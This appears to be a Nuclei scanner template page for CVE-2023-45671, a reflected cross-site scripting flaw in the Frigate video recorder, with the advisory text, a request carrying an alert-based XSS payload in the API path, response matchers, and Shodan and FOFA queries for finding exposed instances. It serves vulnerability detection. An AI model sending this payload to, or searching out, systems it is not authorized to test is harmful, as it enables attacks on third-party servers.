Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
ID: CVE-2023-45671
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,frigate,xss
Description
Section titled “Description”Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the /<camera_name> base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user’s Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user’s Frigate instance; attacker crafts a specialized page which links to the user’s Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
YAML Source
Section titled “YAML Source”id: CVE-2023-45671
info: name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue. remediation: It has been fixed in version 0.13.0 Beta 3 reference: - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f - https://nvd.nist.gov/vuln/detail/CVE-2023-45671 - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.7 cve-id: CVE-2023-45671 cwe-id: CWE-79 epss-score: 0.00924 epss-percentile: 0.82924 cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: frigate product: frigate shodan-query: - title:"Frigate" - http.title:"frigate" fofa-query: title="frigate" google-query: intitle:"frigate" tags: cve,cve2023,frigate,xss
http: - method: GET path: - "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"
matchers: - type: dsl dsl: - 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")' - 'contains(header, "text/html")' - 'status_code == 404' condition: and# digest: 4a0a00473045022050ae96f8a7058eebf4ffbeeb7d86e233e9418cecaf44de194144bae644398bfe022100b785627ac3b3af40dafcc94598ce41887bced8081393fb1247862b6a5259295f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-45671.yaml"